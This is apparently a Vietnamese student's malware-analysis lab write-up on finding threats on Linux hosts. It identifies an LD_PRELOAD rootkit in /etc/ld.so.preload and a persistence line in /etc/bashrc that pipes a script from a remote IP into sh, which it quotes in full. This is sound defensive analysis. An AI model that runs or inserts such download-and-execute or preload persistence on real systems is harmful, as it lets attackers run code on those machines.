Finding Threat (Lab 21 - 24)
Malware Analysis
Lab 21
Recon:
Khi vừa mới mở máy lên, mình đã thấy có một thông báo lỗi như này:

Thư viện libxselinux.so
đã bị từ chối load vào trong LD_PRELOAD
. Đây là một trong số các kĩ thuật hooking mà mình đã được học qua. Có vẻ đây chính là malware. Mình sẽ down về và kiểm tra coi sao

Tuy nhiên mình cứ mở lên hay làm gì là Kapersky ở công ty chặn bay màu :v Mình sẽ thử lấy md5 của file này và up lên VirusTotal xem sao. Nếu nó là một mã độc cũ thì khả năng sẽ có thể detect ra được

Đưa mã hash vào VirusTotal và đúng như mình nghĩ, ta có được 1 con rootkit.

Kết luận:
File mã độc:
/lib64/libxselinux.so
.Mã độc được đưa vào
/etc/ld.so.preload
để được ưu tiên load trước.Cách gỡ mã độc:
sudo rm -rf /lib64/libxselinux.so
Lab 22
Lab lỗi không revert snapshot được
Recon:
Mình đã thử rà soát một hồi nhưng chưa thấy con mal nào cả :<
Kết luận:
Chưa tìm ra malware
Lab 23
Recon:
Với lab này, khi mới kết nối qua SSH, mình thấy có một thông báo như sau:

Thử check .bashrc
, tuy nhiên có vẻ là không có gì trong này

Vậy thì mình sẽ thử check tới file etc/bashrc
coi sao

Mình thấy có một đoạn lệnh curl
sử dụng để down file Ci.sh
về và khởi chạy sử dụng lệnh sh
. Có thể đây chính là mã độc. Thử check url trên, mình thấy file này đã không còn tồn tại, giải thích cho các output mình thấy ban đầu

Kết luận:
Mã độc nằm trong file:
/etc/bashrc
Đoạn mã được sử dụng:
curl -s -L http://217.12.221.12/Ci.sh|sh
Cách gỡ mã độc: xóa dòng trên khỏi file
/etc/bashrc
Lab 24
Lab lỗi không revert snapshot được
Recon:
Lab này mình cũng rà soát một hồi nhưng chưa thấy con mal nào hết
Kết luận:
Chưa tìm thấy malware
© 2024,Pham Quoc Trung. All rights reserved.
Last updated